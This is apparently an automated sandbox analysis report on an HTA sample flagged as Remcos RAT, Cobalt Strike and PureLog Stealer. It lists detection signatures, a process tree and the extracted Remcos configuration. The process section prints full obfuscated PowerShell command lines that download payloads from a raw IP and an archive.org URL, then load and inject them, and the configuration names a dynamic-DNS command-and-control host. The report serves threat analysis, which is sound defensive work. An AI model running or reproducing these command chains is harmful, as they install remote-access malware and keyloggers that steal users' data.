Edit tour
Windows
Analysis Report
LJ1IZDkHyE.hta
Overview
General Information
Sample name: | LJ1IZDkHyE.htarenamed because original name is a hash value |
Original sample name: | d6a04e7ba31d063b7176e3f9fc96c46a.hta |
Analysis ID: | 1518499 |
MD5: | d6a04e7ba31d063b7176e3f9fc96c46a |
SHA1: | e8929b14ea18c20d4a81ac3faf681031924c9d14 |
SHA256: | 2377328ff0a0b26133c534cb523576567f94d73726102f905e97f813b20a86a2 |
Tags: | htaRATRemcosRATuser-abuse_ch |
Infos: | |
Detection
Cobalt Strike, Remcos, PureLog Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 5508 cmdline:
mshta.exe "C:\Users\ user\Deskt op\LJ1IZDk HyE.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - cmd.exe (PID: 940 cmdline:
"C:\Window s\system32 \cmd.exe" "/C PoWerS HELl -Ex bYPass -nOp -w 1 -C DEVIcEcRe deNTIaldep lOymeNt.eX e ; IEX( $(ieX('[SY stem.TEXt. eNcODiNG]' +[char]0X3 a+[CHAR]58 +'uTf8.GET STRiNG([Sy STEm.COnve Rt]'+[cHAR ]0X3A+[CHA R]58+'fRoM basE64Stri nG('+[ChAr ]0X22+'JDB GICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgPSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI EFEZC10eVB lICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgLW1FT WJlckRFRml OSXRJT24gI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAnW0RsbEl tcG9ydCgiV VJsTU9OLkR sbCIsICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgQ 2hhclNldCA 9IENoYXJTZ XQuVW5pY29 kZSldcHVib GljIHN0YXR pYyBleHRlc m4gSW50UHR yIFVSTERvd 25sb2FkVG9 GaWxlKElud FB0ciAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIHh zd0Isc3Rya W5nICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgdkN BeW1xSFcsc 3RyaW5nICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gc0RyLHVpb nQgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBMUix JbnRQdHIgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBncHlSc3V oKTsnICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL W5BTWUgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA ia28iICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL U5BTUVzUGF jRSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIHpnc mZ6QmtEbGl lICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgLVBhc 3NUaHJ1OyA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICQwRjo6V VJMRG93bmx vYWRUb0Zpb GUoMCwiaHR 0cDovLzEwN C4xNjguMzI uMTQ4LzM0N S9uaWNlbWV ldGluZ3NvZ nBpY3R1cmV jbGVhcnRoa W5nc3RvYmU udElGIiwiJ GVudjpBUFB EQVRBXG5pY 2VtZWV0aW5 nc29mcGljd HVyZWNsZWF ydGhpbmdzd G9iLlZicyI sMCwwKTtzd GFyVC1zTGV FcCgzKTtTV GFSVCAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICI kRW5WOkFQU ERBVEFcbml jZW1lZXRpb mdzb2ZwaWN 0dXJlY2xlY XJ0aGluZ3N 0b2IuVmJzI g=='+[CHAr ]0x22+'))' )))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1532 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1600 cmdline:
PoWerSHELl -Ex bYP ass -nOp -w 1 -C DEV IcEcRedeNT IaldeplOym eNt.eXe ; IEX($(ie X('[SYstem .TEXt.eNcO DiNG]'+[ch ar]0X3a+[C HAR]58+'uT f8.GETSTRi NG([SySTEm .COnveRt]' +[cHAR]0X3 A+[CHAR]58 +'fRoMbasE 64StrinG(' +[ChAr]0X2 2+'JDBGICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gPSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIEFEZ C10eVBlICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLW1FTWJlc kRFRmlOSXR JT24gICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAnW 0RsbEltcG9 ydCgiVVJsT U9OLkRsbCI sICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgQ2hhc lNldCA9IEN oYXJTZXQuV W5pY29kZSl dcHVibGljI HN0YXRpYyB leHRlcm4gS W50UHRyIFV STERvd25sb 2FkVG9GaWx lKEludFB0c iAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIHhzd0I sc3RyaW5nI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgdkNBeW1 xSFcsc3Rya W5nICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgc0R yLHVpbnQgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBMUixJbnR QdHIgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBnc HlSc3VoKTs nICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgLW5BT WUgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAia28 iICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgLU5BT UVzUGFjRSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIHpncmZ6Q mtEbGllICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLVBhc3NUa HJ1OyAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICQ wRjo6VVJMR G93bmxvYWR Ub0ZpbGUoM CwiaHR0cDo vLzEwNC4xN jguMzIuMTQ 4LzM0NS9ua WNlbWVldGl uZ3NvZnBpY 3R1cmVjbGV hcnRoaW5nc 3RvYmUudEl GIiwiJGVud jpBUFBEQVR BXG5pY2VtZ WV0aW5nc29 mcGljdHVyZ WNsZWFydGh pbmdzdG9iL lZicyIsMCw wKTtzdGFyV C1zTGVFcCg zKTtTVGFSV CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICIkRW5 WOkFQUERBV EFcbmljZW1 lZXRpbmdzb 2ZwaWN0dXJ lY2xlYXJ0a GluZ3N0b2I uVmJzIg==' +[CHAr]0x2 2+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - csc.exe (PID: 1672 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\rfrvbpim \rfrvbpim. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 768 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S9FA0.tmp" "c:\Users \user\AppD ata\Local\ Temp\rfrvb pim\CSCF31 08577CD134 F5DA2E7D7F 2BD5C877.T MP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - wscript.exe (PID: 2472 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\nicem eetingsofp ictureclea rthingstob .Vbs" MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 6128 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCdnJysnWU Z1cmwgPSAn KydDJysnTk EnKydodHQn KydwcycrJz ovJysnL2lh NjAwMTAwJy snLnVzLicr J2FyY2hpdm UuJysnb3Jn LzI0LycrJ2 l0JysnZW1z LycrJ2RldG EnKydoLW4n KydvJysndG UtJysndi9E ZXRhaE4nKy dvdGVWJysn LicrJ3R4dE NOQScrJztn WUZiYXNlJy snNjRDb250 ZW50ICcrJz 0gKE5lJysn dycrJy1PYm onKydlYycr J3QnKycgU3 lzdCcrJ2Vt Lk4nKydldC crJy5XZWJD bGllbicrJ3 QpJysnLkRv d25sb2FkJy snU3RyaW5n KGdZRicrJ3 VybCknKyc7 ZycrJ1lGYm luYXInKyd5 JysnQ29udG VudCA9ICcr J1tTeXN0ZW 0nKycuQ29u JysndmVydC crJ106OkZy b21CYXNlNj RTJysndCcr J3JpbmcnKy coZ1knKydG YicrJ2FzZS crJzY0Q29u dCcrJ2UnKy duJysndCk7 ZycrJ1lGYS crJ3MnKydz JysnZW1ibC crJ3kgPSBb UmVmbCcrJ2 VjJysndGkn Kydvbi5BJy snc3MnKydl bWJseScrJ1 0nKyc6Oicr J0xvYWQoZ1 lGYmknKydu YXJ5JysnQ2 9uJysndGVu dCcrJyk7Z1 lGdHlwZSA9 IGdZRmEnKy dzc2VtJysn Ymx5LkcnKy dldFR5cGUn KycoQ05BUn VuUEUnKycu SCcrJ29tJy snZUNOJysn QSk7Z1lGJy snbWUnKyd0 aCcrJ29kID 0gZ1lGdCcr J3lwZS5HZX RNZXRob2Qo Q05BVicrJ0 FJQ05BKTtn WUZtZXRob2 QuSW52b2tl KGdZRicrJ2 51bGwsIFtv YmplYycrJ3 RbJysnXV1A KENOQXR4dC 4nKydBWlBQ SEMvNTQnKy czLzg0MS4n KycyMy44Nj EnKycuJysn NDAxLy86cH R0aENOQSAs IENOQWRlc2 F0aXZhZG9D TkEgLCBDTk FkZXNhdGl2 YScrJ2RvQ0 4nKydBICwn KycgQ04nKy dBJysnZGVz YXRpdicrJ2 EnKydkb0NO QSxDJysnTk FSZScrJ2dB c21DTkEnKy csQycrJ05B Q05BJysnKS knKS5yRVBs YUNFKCdDTk EnLFtzdHJJ bmddW0NIYX JdMzkpLnJF UGxhQ0UoJ2 dZRicsJyQn KSB8IC4gKC AkZU5WOkNP bXNwRWNbNC wyNiwyNV0t ak9pTicnKQ ==';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 6196 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1672 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "('g'+ 'YFurl = ' +'C'+'NA'+ 'htt'+'ps' +':/'+'/ia 600100'+'. us.'+'arch ive.'+'org /24/'+'it' +'ems/'+'d eta'+'h-n' +'o'+'te-' +'v/DetahN '+'oteV'+' .'+'txtCNA '+';gYFbas e'+'64Cont ent '+'= ( Ne'+'w'+'- Obj'+'ec'+ 't'+' Syst '+'em.N'+' et'+'.WebC lien'+'t)' +'.Downloa d'+'String (gYF'+'url )'+';g'+'Y Fbinar'+'y '+'Content = '+'[Sys tem'+'.Con '+'vert'+' ]::FromBas e64S'+'t'+ 'ring'+'(g Y'+'Fb'+'a se'+'64Con t'+'e'+'n' +'t);g'+'Y Fa'+'s'+'s '+'embl'+' y = [Refl' +'ec'+'ti' +'on.A'+'s s'+'embly' +']'+'::'+ 'Load(gYFb i'+'nary'+ 'Con'+'ten t'+');gYFt ype = gYFa '+'ssem'+' bly.G'+'et Type'+'(CN ARunPE'+'. H'+'om'+'e CN'+'A);gY F'+'me'+'t h'+'od = g YFt'+'ype. GetMethod( CNAV'+'AIC NA);gYFmet hod.Invoke (gYF'+'nul l, [objec' +'t['+']]@ (CNAtxt.'+ 'AZPPHC/54 '+'3/841.' +'23.861'+ '.'+'401// :ptthCNA , CNAdesati vadoCNA , CNAdesativ a'+'doCN'+ 'A ,'+' CN '+'A'+'des ativ'+'a'+ 'doCNA,C'+ 'NARe'+'gA smCNA'+',C '+'NACNA'+ '))').rEPl aCE('CNA', [strIng][C Har]39).rE PlaCE('gYF ','$') | . ( $eNV:CO mspEc[4,26 ,25]-jOiN' ')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - RegAsm.exe (PID: 6020 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": "ramcxx.duckdns.org:50312:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-M3P7YT", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
Click to see the 25 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 22 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |